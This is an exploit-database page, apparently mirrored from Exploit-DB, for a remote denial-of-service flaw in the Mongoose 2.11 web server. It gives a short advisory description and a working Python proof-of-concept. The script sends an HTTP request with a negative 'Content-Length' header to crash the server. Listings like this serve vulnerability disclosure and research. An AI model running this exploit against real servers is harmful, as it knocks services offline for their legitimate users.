[] NeoSense
E X P L O I T S
title author type platform port cve id

Mongoose 2.11 - 'Content-Length' HTTP Header Remote Denial of Service

Author: JohnLeitch
type: dos
platform: windows
port: 
date_added: 2010-12-27 
date_updated: 2014-11-04 
verified: 1 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: 
source: https://www.securityfocus.com/bid/45602/info

Mongoose is prone to a remote denial-of-service vulnerability because it fails to handle specially crafted input.

Successfully exploiting this issue will allow an attacker to crash the affected application, denying further service to legitimate users.

Mongoose 2.11 is vulnerable; other versions may also be affected.

import socket

host = 'localhost'
port = 8080

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(8)
s.connect((host, port))
s.send('GET / HTTP/1.1\r\n'
       'Host: ' + host + '\r\n'
       'Content-Length: -2147483648\r\n\r\n')
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.